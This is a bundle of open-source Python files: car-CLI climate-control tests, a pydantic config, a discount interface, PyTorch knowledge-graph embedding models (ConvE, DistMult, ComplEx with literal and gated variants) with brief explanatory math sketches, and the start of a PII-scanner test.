initialise_credential_store(include_account_id=True, include_vin=True)
url = fixtures.inject_set_hvac_start(mocked_responses, "start")
result = cli_runner.invoke(__main__.main, "hvac start --temperature 25")
assert result.exit_code == 0, result.exception
expected_json = {
"data": {
"attributes": {"action": "start", "targetTemperature": 25},
"type": "HvacStart",
}
}
expected_output = "{'action': 'start', 'targetTemperature': 21.0}\n"
request: RequestCall = mocked_responses.requests[("POST", URL(url))][0]
assert expected_json == request.kwargs["json"]
assert expected_output == result.output
def test_hvac_start_later(
mocked_responses: aioresponses, cli_runner: CliRunner
) -> None:
"""It exits with a status code of zero."""
initialise_credential_store(include_account_id=True, include_vin=True)
url = fixtures.inject_set_hvac_start(mocked_responses, "start")
result = cli_runner.invoke(
__main__.main, "hvac start --temperature 24 --at '2020-12-25T11:50:00+02:00'"
)
assert result.exit_code == 0, result.exception
expected_json = {
"data": {
"attributes": {
"action": "start",
"startDateTime": "2020-12-25T09:50:00Z",
"targetTemperature": 24,
},
"type": "HvacStart",
}
}
expected_output = "{'action': 'start', 'targetTemperature': 21.0}\n"
request: RequestCall = mocked_responses.requests[("POST", URL(url))][0]
assert expected_json == request.kwargs["json"]
assert expected_output == result.output


# configs/configs.py (sunnyfloyd/panderyx, MIT)
from typing import Union
from pydantic import BaseModel, HttpUrl, FilePath


class InputConfig(BaseModel):
path: Union[HttpUrl, FilePath]
extension: str


# ecommerce_api/core/discount/interfaces.py (victormartinez/ecommerceapi, MIT)
from abc import ABC, abstractmethod
from typing import Optional


class AbstractDiscountClient(ABC):
@abstractmethod
def get_discount_percentage(self, product_id: int) -> Optional[float]:
pass


# model.py (Otamio/kge-conve, Apache-2.0)
import torch
from torch.nn import functional as F, Parameter
from torch.autograd import Variable
from spodernet.utils.global_config import Config
from spodernet.utils.cuda_utils import CUDATimer
from torch.nn.init import xavier_normal_, xavier_uniform_
from torch.nn.utils.rnn import pack_padded_sequence, pad_packed_sequence
import torch.nn as nn
import pdb
from itertools import chain

timer = CUDATimer()


class Complex(torch.nn.Module):
def __init__(self, num_entities, num_relations):
super(Complex, self).__init__()
self.num_entities = num_entities
self.emb_e_real = torch.nn.Embedding(num_entities, Config.embedding_dim, padding_idx=0)
self.emb_e_img = torch.nn.Embedding(num_entities, Config.embedding_dim, padding_idx=0)
self.emb_rel_real = torch.nn.Embedding(num_relations, Config.embedding_dim, padding_idx=0)
self.emb_rel_img = torch.nn.Embedding(num_relations, Config.embedding_dim, padding_idx=0)
self.inp_drop = torch.nn.Dropout(Config.input_dropout)
self.loss = torch.nn.BCELoss()
def init(self):
xavier_normal_(self.emb_e_real.weight.data)
xavier_normal_(self.emb_e_img.weight.data)
xavier_normal_(self.emb_rel_real.weight.data)
xavier_normal_(self.emb_rel_img.weight.data)
def forward(self, e1, rel):
        e1_embedded_real = self.emb_e_real(e1).view(Config.batch_size, -1)
        rel_embedded_real = self.emb_rel_real(rel).view(Config.batch_size, -1)
        e1_embedded_img = self.emb_e_img(e1).view(Config.batch_size, -1)
        rel_embedded_img = self.emb_rel_img(rel).view(Config.batch_size, -1)

        e1_embedded_real = self.inp_drop(e1_embedded_real)
        rel_embedded_real = self.inp_drop(rel_embedded_real)
        e1_embedded_img = self.inp_drop(e1_embedded_img)
        rel_embedded_img = self.inp_drop(rel_embedded_img)
# complex space bilinear product (equivalent to HolE)
realrealreal = torch.mm(e1_embedded_real*rel_embedded_real, self.emb_e_real.weight.transpose(1,0))
realimgimg = torch.mm(e1_embedded_real*rel_embedded_img, self.emb_e_img.weight.transpose(1,0))
imgrealimg = torch.mm(e1_embedded_img*rel_embedded_real, self.emb_e_img.weight.transpose(1,0))
imgimgreal = torch.mm(e1_embedded_img*rel_embedded_img, self.emb_e_real.weight.transpose(1,0))
pred = realrealreal + realimgimg + imgrealimg - imgimgreal
pred = F.sigmoid(pred)
return pred
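The four-term sum in `Complex.forward` is the real part of the trilinear complex product Re(&lt;e1, r, conj(e2)&gt;). A minimal sketch of that identity on plain Python complex numbers (illustrative values, not model weights):

```python
# Sketch: the real/imaginary decomposition used by the Complex model
# equals Re(e1 * r * conj(e2)) for a single triple component.
e1, r, e2 = complex(0.3, -0.2), complex(0.5, 0.1), complex(-0.4, 0.7)

four_term = (
    e1.real * r.real * e2.real      # realrealreal
    + e1.real * r.imag * e2.imag    # realimgimg
    + e1.imag * r.real * e2.imag    # imgrealimg
    - e1.imag * r.imag * e2.real    # imgimgreal
)
assert abs(four_term - (e1 * r * e2.conjugate()).real) < 1e-12
```

The model computes these four terms as matrix products over all entities at once; the scalar version above just checks the algebra.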


class DistMult(torch.nn.Module):
def __init__(self, num_entities, num_relations):
super(DistMult, self).__init__()
self.emb_e = torch.nn.Embedding(num_entities, Config.embedding_dim, padding_idx=0)
self.emb_rel = torch.nn.Embedding(num_relations, Config.embedding_dim, padding_idx=0)
self.inp_drop = torch.nn.Dropout(Config.input_dropout)
self.loss = torch.nn.BCELoss()
def init(self):
xavier_normal_(self.emb_e.weight.data)
xavier_normal_(self.emb_rel.weight.data)
def forward(self, e1, rel):
e1_embedded= self.emb_e(e1)
rel_embedded= self.emb_rel(rel)
e1_embedded = e1_embedded.view(-1, Config.embedding_dim)
rel_embedded = rel_embedded.view(-1, Config.embedding_dim)
e1_embedded = self.inp_drop(e1_embedded)
rel_embedded = self.inp_drop(rel_embedded)
pred = torch.mm(e1_embedded*rel_embedded, self.emb_e.weight.transpose(1,0))
pred = F.sigmoid(pred)
return pred


class ConvE(torch.nn.Module):
def __init__(self, num_entities, num_relations):
super(ConvE, self).__init__()
self.emb_e = torch.nn.Embedding(num_entities, Config.embedding_dim, padding_idx=0)
self.emb_rel = torch.nn.Embedding(num_relations, Config.embedding_dim, padding_idx=0)
self.inp_drop = torch.nn.Dropout(Config.input_dropout)
self.hidden_drop = torch.nn.Dropout(Config.dropout)
self.feature_map_drop = torch.nn.Dropout2d(Config.feature_map_dropout)
self.loss = torch.nn.BCELoss()
self.conv1 = torch.nn.Conv2d(1, 32, (3, 3), 1, 0, bias=Config.use_bias)
self.bn0 = torch.nn.BatchNorm2d(1)
self.bn1 = torch.nn.BatchNorm2d(32)
self.bn2 = torch.nn.BatchNorm1d(Config.embedding_dim)
self.register_parameter('b', Parameter(torch.zeros(num_entities)))
self.fc = torch.nn.Linear(10368,Config.embedding_dim)
print(num_entities, num_relations)
def init(self):
xavier_normal_(self.emb_e.weight.data)
xavier_normal_(self.emb_rel.weight.data)
def forward(self, e1, rel):
e1_embedded= self.emb_e(e1).view(Config.batch_size, 1, 10, 20)
rel_embedded = self.emb_rel(rel).view(Config.batch_size, 1, 10, 20)
stacked_inputs = torch.cat([e1_embedded, rel_embedded], 2)
stacked_inputs = self.bn0(stacked_inputs)
x= self.inp_drop(stacked_inputs)
x= self.conv1(x)
x= self.bn1(x)
x= F.relu(x)
x = self.feature_map_drop(x)
x = x.view(Config.batch_size, -1)
#print(x.size())
x = self.fc(x)
x = self.hidden_drop(x)
x = self.bn2(x)
x = F.relu(x)
x = torch.mm(x, self.emb_e.weight.transpose(1,0))
x += self.b.expand_as(x)
pred = F.sigmoid(x)
return pred
"""
Literal Models
--------------
"""
class DistMultLiteral(torch.nn.Module):
def __init__(self, num_entities, num_relations, numerical_literals):
super(DistMultLiteral, self).__init__()
self.emb_dim = Config.embedding_dim
self.emb_e = torch.nn.Embedding(num_entities, self.emb_dim, padding_idx=0)
self.emb_rel = torch.nn.Embedding(num_relations, self.emb_dim, padding_idx=0)
# Literal
# num_ent x n_num_lit
self.numerical_literals = Variable(torch.from_numpy(numerical_literals)).cuda()
self.n_num_lit = self.numerical_literals.size(1)
self.emb_num_lit = torch.nn.Linear(self.emb_dim+self.n_num_lit, self.emb_dim)
# Dropout + loss
self.inp_drop = torch.nn.Dropout(Config.input_dropout)
self.loss = torch.nn.BCELoss()
def init(self):
xavier_normal_(self.emb_e.weight.data)
xavier_normal_(self.emb_rel.weight.data)
def forward(self, e1, rel):
e1_emb = self.emb_e(e1)
rel_emb = self.emb_rel(rel)
e1_emb = e1_emb.view(-1, self.emb_dim)
rel_emb = rel_emb.view(-1, self.emb_dim)
# Begin literals
e1_num_lit = self.numerical_literals[e1.view(-1)]
e1_emb = self.emb_num_lit(torch.cat([e1_emb, e1_num_lit], 1))
e2_multi_emb = self.emb_num_lit(torch.cat([self.emb_e.weight, self.numerical_literals], 1))
# End literals
e1_emb = self.inp_drop(e1_emb)
rel_emb = self.inp_drop(rel_emb)
pred = torch.mm(e1_emb*rel_emb, e2_multi_emb.t())
pred = F.sigmoid(pred)
return pred


class KBLN(torch.nn.Module):
def __init__(self, num_entities, num_relations, numerical_literals, c, var):
super(KBLN, self).__init__()
self.num_entities = num_entities
self.emb_dim = Config.embedding_dim
self.emb_e = torch.nn.Embedding(num_entities, self.emb_dim, padding_idx=0)
self.emb_rel = torch.nn.Embedding(num_relations, self.emb_dim, padding_idx=0)
# Literal
# num_ent x n_num_lit
self.numerical_literals = Variable(torch.from_numpy(numerical_literals)).cuda()
self.n_num_lit = self.numerical_literals.size(1)
# Fixed RBF parameters
print(c)
print(var)
self.c = Variable(torch.FloatTensor(c)).cuda()
self.var = Variable(torch.FloatTensor(var)).cuda()
        # Weights for numerical features, one per relation
self.nf_weights = nn.Embedding(num_relations, self.n_num_lit)
# Dropout + loss
self.inp_drop = torch.nn.Dropout(Config.input_dropout)
self.loss = torch.nn.BCELoss()
def init(self):
xavier_normal_(self.emb_e.weight.data)
xavier_normal_(self.emb_rel.weight.data)
def forward(self, e1, rel):
e1_emb = self.emb_e(e1).view(-1, self.emb_dim)
rel_emb = self.emb_rel(rel).view(-1, self.emb_dim)
e1_emb = self.inp_drop(e1_emb)
rel_emb = self.inp_drop(rel_emb)
score_l = torch.mm(e1_emb*rel_emb, self.emb_e.weight.t())
""" Begin numerical literals """
n_h = self.numerical_literals[e1.view(-1)] # (batch_size x n_lit)
n_t = self.numerical_literals # (num_ents x n_lit)
# Features (batch_size x num_ents x n_lit)
n = n_h.unsqueeze(1).repeat(1, self.num_entities, 1) - n_t
phi = self.rbf(n)
# Weights (batch_size, 1, n_lits)
w_nf = self.nf_weights(rel)
# (batch_size, num_ents)
score_n = torch.bmm(phi, w_nf.transpose(1, 2)).squeeze()
""" End numerical literals """
score = F.sigmoid(score_l + score_n)
return score
def rbf(self, n):
"""
Apply RBF kernel parameterized by (fixed) c and var, pointwise.
n: (batch_size, num_ents, n_lit)
"""
return torch.exp(-(n - self.c)**2 / self.var)
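The pointwise RBF feature above can be sketched on plain floats (the model applies it elementwise to tensors; `c` and `var` here are made-up example values, not the statistics KBLN precomputes from the data):

```python
import math

def rbf_feature(n: float, c: float, var: float) -> float:
    """Pointwise radial basis feature exp(-(n - c)^2 / var)."""
    return math.exp(-((n - c) ** 2) / var)

# A literal difference equal to the mean (n == c) gives the maximal
# feature value of 1.0; larger deviations decay smoothly towards 0.
peak = rbf_feature(0.5, 0.5, 2.0)   # 1.0
tail = rbf_feature(3.0, 0.5, 2.0)   # much smaller
```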


class MTKGNN_DistMult(torch.nn.Module):
def __init__(self, num_entities, num_relations, numerical_literals):
super(MTKGNN_DistMult, self).__init__()
self.emb_dim = Config.embedding_dim
self.num_entities = num_entities
self.num_relations = num_relations
self.emb_e = torch.nn.Embedding(num_entities, self.emb_dim, padding_idx=0)
self.emb_rel = torch.nn.Embedding(num_relations, self.emb_dim, padding_idx=0)
# Literal
# num_ent x n_num_lit
self.numerical_literals = Variable(torch.from_numpy(numerical_literals)).cuda()
self.n_num_lit = self.numerical_literals.size(1)
self.emb_attr = torch.nn.Embedding(self.n_num_lit, self.emb_dim)
self.attr_net_left = torch.nn.Sequential(
torch.nn.Linear(2*self.emb_dim, 100),
torch.nn.Tanh(),
torch.nn.Linear(100, 1))
self.attr_net_right = torch.nn.Sequential(
torch.nn.Linear(2*self.emb_dim, 100),
torch.nn.Tanh(),
torch.nn.Linear(100, 1))
self.rel_params = chain(self.emb_e.parameters(), self.emb_rel.parameters())
self.attr_params = chain(self.emb_e.parameters(), self.emb_attr.parameters(),
self.attr_net_left.parameters(), self.attr_net_right.parameters())
# Dropout + loss
self.inp_drop = torch.nn.Dropout(Config.input_dropout)
self.loss_rel = torch.nn.BCELoss()
self.loss_attr = torch.nn.MSELoss()
def init(self):
xavier_normal_(self.emb_e.weight.data)
xavier_normal_(self.emb_rel.weight.data)
def forward(self, e1, rel):
e1_embedded= self.emb_e(e1)
rel_embedded= self.emb_rel(rel)
e1_embedded = e1_embedded.view(-1, Config.embedding_dim)
rel_embedded = rel_embedded.view(-1, Config.embedding_dim)
e1_embedded = self.inp_drop(e1_embedded)
rel_embedded = self.inp_drop(rel_embedded)
pred = torch.mm(e1_embedded*rel_embedded, self.emb_e.weight.transpose(1,0))
pred = F.sigmoid(pred)
return pred
def forward_attr(self, e, mode='left'):
assert mode == 'left' or mode == 'right'
e_emb = self.emb_e(e.view(-1))
# Sample one numerical literal for each entity
e_attr = self.numerical_literals[e.view(-1)]
m = len(e_attr)
idxs = torch.randint(self.n_num_lit, size=(m,)).cuda()
attr_emb = self.emb_attr(idxs)
inputs = torch.cat([e_emb, attr_emb], dim=1)
pred = self.attr_net_left(inputs) if mode == 'left' else self.attr_net_right(inputs)
target = e_attr[range(m), idxs]
return pred, target
def forward_AST(self):
m = Config.batch_size
idxs_attr = torch.randint(self.n_num_lit, size=(m,)).cuda()
idxs_ent = torch.randint(self.num_entities, size=(m,)).cuda()
attr_emb = self.emb_attr(idxs_attr)
ent_emb = self.emb_e(idxs_ent)
inputs = torch.cat([ent_emb, attr_emb], dim=1)
pred_left = self.attr_net_left(inputs)
pred_right = self.attr_net_right(inputs)
target = self.numerical_literals[idxs_ent][range(m), idxs_attr]
return pred_left, pred_right, target


class ComplexLiteral(torch.nn.Module):
def __init__(self, num_entities, num_relations, numerical_literals):
super(ComplexLiteral, self).__init__()
self.emb_dim = Config.embedding_dim
self.emb_e_real = torch.nn.Embedding(num_entities, self.emb_dim, padding_idx=0)
self.emb_e_img = torch.nn.Embedding(num_entities, self.emb_dim, padding_idx=0)
self.emb_rel_real = torch.nn.Embedding(num_relations, self.emb_dim, padding_idx=0)
self.emb_rel_img = torch.nn.Embedding(num_relations, self.emb_dim, padding_idx=0)
# Literal
# num_ent x n_num_lit
self.numerical_literals = Variable(torch.from_numpy(numerical_literals)).cuda()
self.n_num_lit = self.numerical_literals.size(1)
self.emb_num_lit_real = torch.nn.Sequential(
torch.nn.Linear(self.emb_dim+self.n_num_lit, self.emb_dim),
torch.nn.Tanh()
)
self.emb_num_lit_img = torch.nn.Sequential(
torch.nn.Linear(self.emb_dim+self.n_num_lit, self.emb_dim),
torch.nn.Tanh()
)
# Dropout + loss
self.inp_drop = torch.nn.Dropout(Config.input_dropout)
self.loss = torch.nn.BCELoss()
def init(self):
xavier_normal_(self.emb_e_real.weight.data)
xavier_normal_(self.emb_e_img.weight.data)
xavier_normal_(self.emb_rel_real.weight.data)
xavier_normal_(self.emb_rel_img.weight.data)
def forward(self, e1, rel):
e1_emb_real = self.emb_e_real(e1).view(Config.batch_size, -1)
rel_emb_real = self.emb_rel_real(rel).view(Config.batch_size, -1)
e1_emb_img = self.emb_e_img(e1).view(Config.batch_size, -1)
rel_emb_img = self.emb_rel_img(rel).view(Config.batch_size, -1)
# Begin literals
e1_num_lit = self.numerical_literals[e1.view(-1)]
e1_emb_real = self.emb_num_lit_real(torch.cat([e1_emb_real, e1_num_lit], 1))
e1_emb_img = self.emb_num_lit_img(torch.cat([e1_emb_img, e1_num_lit], 1))
e2_multi_emb_real = self.emb_num_lit_real(torch.cat([self.emb_e_real.weight, self.numerical_literals], 1))
e2_multi_emb_img = self.emb_num_lit_img(torch.cat([self.emb_e_img.weight, self.numerical_literals], 1))
# End literals
e1_emb_real = self.inp_drop(e1_emb_real)
rel_emb_real = self.inp_drop(rel_emb_real)
e1_emb_img = self.inp_drop(e1_emb_img)
rel_emb_img = self.inp_drop(rel_emb_img)
realrealreal = torch.mm(e1_emb_real*rel_emb_real, e2_multi_emb_real.t())
realimgimg = torch.mm(e1_emb_real*rel_emb_img, e2_multi_emb_img.t())
imgrealimg = torch.mm(e1_emb_img*rel_emb_real, e2_multi_emb_img.t())
imgimgreal = torch.mm(e1_emb_img*rel_emb_img, e2_multi_emb_real.t())
pred = realrealreal + realimgimg + imgrealimg - imgimgreal
pred = F.sigmoid(pred)
return pred


class ConvELiteral(torch.nn.Module):
def __init__(self, num_entities, num_relations, numerical_literals):
super(ConvELiteral, self).__init__()
self.emb_dim = Config.embedding_dim
self.emb_e = torch.nn.Embedding(num_entities, self.emb_dim, padding_idx=0)
self.emb_rel = torch.nn.Embedding(num_relations, self.emb_dim, padding_idx=0)
# Literal
# num_ent x n_num_lit
self.numerical_literals = Variable(torch.from_numpy(numerical_literals)).cuda()
self.n_num_lit = self.numerical_literals.size(1)
self.emb_num_lit = torch.nn.Sequential(
torch.nn.Linear(self.emb_dim+self.n_num_lit, self.emb_dim),
torch.nn.Tanh()
)
self.inp_drop = torch.nn.Dropout(Config.input_dropout)
self.hidden_drop = torch.nn.Dropout(Config.dropout)
self.feature_map_drop = torch.nn.Dropout2d(Config.feature_map_dropout)
self.loss = torch.nn.BCELoss()
self.conv1 = torch.nn.Conv2d(1, 32, (3, 3), 1, 0, bias=Config.use_bias)
self.bn0 = torch.nn.BatchNorm2d(1)
self.bn1 = torch.nn.BatchNorm2d(32)
self.bn2 = torch.nn.BatchNorm1d(self.emb_dim)
self.register_parameter('b', Parameter(torch.zeros(num_entities)))
self.fc = torch.nn.Linear(10368, self.emb_dim)
print(num_entities, num_relations)
def init(self):
xavier_normal_(self.emb_e.weight.data)
xavier_normal_(self.emb_rel.weight.data)
def forward(self, e1, rel):
e1_emb = self.emb_e(e1).view(Config.batch_size, -1)
rel_emb = self.emb_rel(rel)
# Begin literals
e1_num_lit = self.numerical_literals[e1.view(-1)]
e1_emb = self.emb_num_lit(torch.cat([e1_emb, e1_num_lit], 1))
e2_multi_emb = self.emb_num_lit(torch.cat([self.emb_e.weight, self.numerical_literals], 1))
# End literals
e1_emb = e1_emb.view(Config.batch_size, 1, 10, self.emb_dim//10)
rel_emb = rel_emb.view(Config.batch_size, 1, 10, self.emb_dim//10)
stacked_inputs = torch.cat([e1_emb, rel_emb], 2)
stacked_inputs = self.bn0(stacked_inputs)
x = self.inp_drop(stacked_inputs)
x = self.conv1(x)
x = self.bn1(x)
x = F.relu(x)
x = self.feature_map_drop(x)
x = x.view(Config.batch_size, -1)
# print(x.size())
x = self.fc(x)
x = self.hidden_drop(x)
x = self.bn2(x)
x = F.relu(x)
x = torch.mm(x, e2_multi_emb.t())
x += self.b.expand_as(x)
pred = F.sigmoid(x)
return pred


class Gate(nn.Module):
def __init__(self,
input_size,
output_size,
# gate_activation=nn.functional.softmax):
gate_activation=nn.functional.sigmoid):
super(Gate, self).__init__()
self.output_size = output_size
self.gate_activation = gate_activation
self.g = nn.Linear(input_size, output_size)
self.g1 = nn.Linear(output_size, output_size, bias=False)
self.g2 = nn.Linear(input_size-output_size, output_size, bias=False)
self.gate_bias = nn.Parameter(torch.zeros(output_size))
def forward(self, x_ent, x_lit):
x = torch.cat([x_ent, x_lit], 1)
g_embedded = F.tanh(self.g(x))
gate = self.gate_activation(self.g1(x_ent) + self.g2(x_lit) + self.gate_bias)
output = (1-gate) * x_ent + gate * g_embedded
return output
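A scalar sketch of the gating formula `Gate` implements (illustrative constants, not trained weights): the gate value g in (0, 1) interpolates between the plain entity component and the literal-enriched one.

```python
import math

def sigmoid(z: float) -> float:
    return 1.0 / (1.0 + math.exp(-z))

# output = (1 - g) * x_ent + g * g_embedded, applied per component
x_ent = 0.2        # one component of the entity embedding
g_embedded = 0.9   # corresponding component of tanh(W [x_ent; x_lit])
g = sigmoid(1.5)   # gate value from the learned linear maps + bias
output = (1 - g) * x_ent + g * g_embedded
# output lies between x_ent and g_embedded, closer to whichever
# side the gate favours
```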


class DistMultLiteral_gate(torch.nn.Module):
def __init__(self, num_entities, num_relations, numerical_literals):
super(DistMultLiteral_gate, self).__init__()
self.emb_dim = Config.embedding_dim
self.emb_e = torch.nn.Embedding(num_entities, self.emb_dim, padding_idx=0)
self.emb_rel = torch.nn.Embedding(num_relations, self.emb_dim, padding_idx=0)
# Literal
# num_ent x n_num_lit
self.numerical_literals = Variable(torch.from_numpy(numerical_literals)).cuda()
self.n_num_lit = self.numerical_literals.size(1)
self.emb_num_lit = Gate(self.emb_dim+self.n_num_lit, self.emb_dim)
# Dropout + loss
self.inp_drop = torch.nn.Dropout(Config.input_dropout)
self.loss = torch.nn.BCELoss()
def init(self):
xavier_normal_(self.emb_e.weight.data)
xavier_normal_(self.emb_rel.weight.data)
def forward(self, e1, rel):
e1_emb = self.emb_e(e1)
rel_emb = self.emb_rel(rel)
e1_emb = e1_emb.view(-1, self.emb_dim)
rel_emb = rel_emb.view(-1, self.emb_dim)
# Begin literals
e1_num_lit = self.numerical_literals[e1.view(-1)]
e1_emb = self.emb_num_lit(e1_emb, e1_num_lit)
e2_multi_emb = self.emb_num_lit(self.emb_e.weight, self.numerical_literals)
# End literals
e1_emb = self.inp_drop(e1_emb)
rel_emb = self.inp_drop(rel_emb)
pred = torch.mm(e1_emb*rel_emb, e2_multi_emb.t())
pred = F.sigmoid(pred)
return pred


class ComplexLiteral_gate(torch.nn.Module):
def __init__(self, num_entities, num_relations, numerical_literals):
super(ComplexLiteral_gate, self).__init__()
self.emb_dim = Config.embedding_dim
self.emb_e_real = torch.nn.Embedding(num_entities, self.emb_dim, padding_idx=0)
self.emb_e_img = torch.nn.Embedding(num_entities, self.emb_dim, padding_idx=0)
self.emb_rel_real = torch.nn.Embedding(num_relations, self.emb_dim, padding_idx=0)
self.emb_rel_img = torch.nn.Embedding(num_relations, self.emb_dim, padding_idx=0)
# Literal
# num_ent x n_num_lit
self.numerical_literals = Variable(torch.from_numpy(numerical_literals)).cuda()
self.n_num_lit = self.numerical_literals.size(1)
self.emb_num_lit_real = Gate(self.emb_dim+self.n_num_lit, self.emb_dim)
self.emb_num_lit_img = Gate(self.emb_dim+self.n_num_lit, self.emb_dim)
# Dropout + loss
self.inp_drop = torch.nn.Dropout(Config.input_dropout)
self.loss = torch.nn.BCELoss()
def init(self):
xavier_normal_(self.emb_e_real.weight.data)
xavier_normal_(self.emb_e_img.weight.data)
xavier_normal_(self.emb_rel_real.weight.data)
xavier_normal_(self.emb_rel_img.weight.data)
def forward(self, e1, rel):
e1_emb_real = self.emb_e_real(e1).view(Config.batch_size, -1)
rel_emb_real = self.emb_rel_real(rel).view(Config.batch_size, -1)
e1_emb_img = self.emb_e_img(e1).view(Config.batch_size, -1)
rel_emb_img = self.emb_rel_img(rel).view(Config.batch_size, -1)
# Begin literals
e1_num_lit = self.numerical_literals[e1.view(-1)]
e1_emb_real = self.emb_num_lit_real(e1_emb_real, e1_num_lit)
e1_emb_img = self.emb_num_lit_img(e1_emb_img, e1_num_lit)
e2_multi_emb_real = self.emb_num_lit_real(self.emb_e_real.weight, self.numerical_literals)
e2_multi_emb_img = self.emb_num_lit_img(self.emb_e_img.weight, self.numerical_literals)
# End literals
e1_emb_real = self.inp_drop(e1_emb_real)
rel_emb_real = self.inp_drop(rel_emb_real)
e1_emb_img = self.inp_drop(e1_emb_img)
rel_emb_img = self.inp_drop(rel_emb_img)
realrealreal = torch.mm(e1_emb_real*rel_emb_real, e2_multi_emb_real.t())
realimgimg = torch.mm(e1_emb_real*rel_emb_img, e2_multi_emb_img.t())
imgrealimg = torch.mm(e1_emb_img*rel_emb_real, e2_multi_emb_img.t())
imgimgreal = torch.mm(e1_emb_img*rel_emb_img, e2_multi_emb_real.t())
pred = realrealreal + realimgimg + imgrealimg - imgimgreal
pred = F.sigmoid(pred)
return pred


class ConvELiteral_gate(torch.nn.Module):
def __init__(self, num_entities, num_relations, numerical_literals):
super(ConvELiteral_gate, self).__init__()
self.emb_dim = Config.embedding_dim
self.emb_e = torch.nn.Embedding(num_entities, self.emb_dim, padding_idx=0)
self.emb_rel = torch.nn.Embedding(num_relations, self.emb_dim, padding_idx=0)
# Literal
# num_ent x n_num_lit
self.numerical_literals = Variable(torch.from_numpy(numerical_literals)).cuda()
self.n_num_lit = self.numerical_literals.size(1)
self.emb_num_lit = Gate(self.emb_dim+self.n_num_lit, self.emb_dim)
self.inp_drop = torch.nn.Dropout(Config.input_dropout)
self.hidden_drop = torch.nn.Dropout(Config.dropout)
self.feature_map_drop = torch.nn.Dropout2d(Config.feature_map_dropout)
self.loss = torch.nn.BCELoss()
self.conv1 = torch.nn.Conv2d(1, 32, (3, 3), 1, 0, bias=Config.use_bias)
self.bn0 = torch.nn.BatchNorm2d(1)
self.bn1 = torch.nn.BatchNorm2d(32)
self.bn2 = torch.nn.BatchNorm1d(self.emb_dim)
self.register_parameter('b', Parameter(torch.zeros(num_entities)))
self.fc = torch.nn.Linear(10368, self.emb_dim)
print(num_entities, num_relations)
def init(self):
xavier_normal_(self.emb_e.weight.data)
xavier_normal_(self.emb_rel.weight.data)
def forward(self, e1, rel):
e1_emb = self.emb_e(e1).view(Config.batch_size, -1)
rel_emb = self.emb_rel(rel)
# Begin literals
e1_num_lit = self.numerical_literals[e1.view(-1)]
e1_emb = self.emb_num_lit(e1_emb, e1_num_lit)
e2_multi_emb = self.emb_num_lit(self.emb_e.weight, self.numerical_literals)
# End literals
e1_emb = e1_emb.view(Config.batch_size, 1, 10, self.emb_dim//10)
rel_emb = rel_emb.view(Config.batch_size, 1, 10, self.emb_dim//10)
stacked_inputs = torch.cat([e1_emb, rel_emb], 2)
stacked_inputs = self.bn0(stacked_inputs)
x = self.inp_drop(stacked_inputs)
x = self.conv1(x)
x = self.bn1(x)
x = F.relu(x)
x = self.feature_map_drop(x)
x = x.view(Config.batch_size, -1)
# print(x.size())
x = self.fc(x)
x = self.hidden_drop(x)
x = self.bn2(x)
x = F.relu(x)
x = torch.mm(x, e2_multi_emb.t())
x += self.b.expand_as(x)
pred = F.sigmoid(x)
return pred
"""
TEXT LITERALS
-----------------------------------
"""
class GateMulti(nn.Module):
def __init__(self, emb_size, num_lit_size, txt_lit_size, gate_activation=nn.functional.sigmoid):
super(GateMulti, self).__init__()
self.emb_size = emb_size
self.num_lit_size = num_lit_size
self.txt_lit_size = txt_lit_size
self.gate_activation = gate_activation
self.g = nn.Linear(emb_size+num_lit_size+txt_lit_size, emb_size)
self.gate_ent = nn.Linear(emb_size, emb_size, bias=False)
self.gate_num_lit = nn.Linear(num_lit_size, emb_size, bias=False)
self.gate_txt_lit = nn.Linear(txt_lit_size, emb_size, bias=False)
self.gate_bias = nn.Parameter(torch.zeros(emb_size))
def forward(self, x_ent, x_lit_num, x_lit_txt):
x = torch.cat([x_ent, x_lit_num, x_lit_txt], 1)
g_embedded = F.tanh(self.g(x))
gate = self.gate_activation(self.gate_ent(x_ent) + self.gate_num_lit(x_lit_num) + self.gate_txt_lit(x_lit_txt) + self.gate_bias)
output = (1-gate) * x_ent + gate * g_embedded
return output


class DistMultLiteral_gate_text(torch.nn.Module):
def __init__(self, num_entities, num_relations, numerical_literals, text_literals):
super(DistMultLiteral_gate_text, self).__init__()
self.emb_dim = Config.embedding_dim
self.emb_e = torch.nn.Embedding(num_entities, self.emb_dim, padding_idx=0)
self.emb_rel = torch.nn.Embedding(num_relations, self.emb_dim, padding_idx=0)
# Num. Literal
# num_ent x n_num_lit
self.numerical_literals = Variable(torch.from_numpy(numerical_literals)).cuda()
self.n_num_lit = self.numerical_literals.size(1)
# Txt. Literal
# num_ent x n_txt_lit
self.text_literals = Variable(torch.from_numpy(text_literals)).cuda()
self.n_txt_lit = self.text_literals.size(1)
# LiteralE's g
self.emb_lit = GateMulti(self.emb_dim, self.n_num_lit, self.n_txt_lit)
# Dropout + loss
self.inp_drop = torch.nn.Dropout(Config.input_dropout)
self.loss = torch.nn.BCELoss()
def init(self):
xavier_normal_(self.emb_e.weight.data)
xavier_normal_(self.emb_rel.weight.data)
def forward(self, e1, rel):
e1_emb = self.emb_e(e1)
rel_emb = self.emb_rel(rel)
e1_emb = e1_emb.view(-1, self.emb_dim)
rel_emb = rel_emb.view(-1, self.emb_dim)
# Begin literals
# --------------
e1_num_lit = self.numerical_literals[e1.view(-1)]
e1_txt_lit = self.text_literals[e1.view(-1)]
e1_emb = self.emb_lit(e1_emb, e1_num_lit, e1_txt_lit)
e2_multi_emb = self.emb_lit(self.emb_e.weight, self.numerical_literals, self.text_literals)
# --------------
# End literals
e1_emb = self.inp_drop(e1_emb)
rel_emb = self.inp_drop(rel_emb)
pred = torch.mm(e1_emb*rel_emb, e2_multi_emb.t())
pred = F.sigmoid(pred)
return pred


# tests/test_incremental.py (argos-education/piicatcher, Apache-2.0)
import datetime
import time
from typing import Generator, Tuple
import pytest
from dbcat.api import scan_sources
from dbcat.catalog import Catalog
from pytest_cases import fixture
from piicatcher.api import scan_database
from piicatcher.generators import column_generator, data_generator
from piicatcher.output import output_dict, output_tabular


@fixture(scope="module")
def setup_incremental(
load_sample_data, load_data
) -> Generator[Tuple[Catalog, int], None, None]:
catalog, source_id, name = load_sample_data
with catalog.managed_session:
scan_sources(catalog, [name], include_table_regex=["sample"])
time.sleep(1)
with catalog.managed_session:
source = catalog.get_source_by_id(source_id)
scan_database(catalog=catalog, source=source, include_table_regex=["sample"])
time.sleep(1)
with catalog.managed_session:
scan_sources(catalog, [name])
time.sleep(1)
with catalog.managed_session:
scan_database(catalog=catalog, source=source, include_table_regex=["partial.*"])
yield catalog, source_id


def test_incremental_scan(setup_incremental):
catalog, source_id = setup_incremental
with catalog.managed_session:
source = catalog.get_source_by_id(source_id)
# there should be 2 tasks
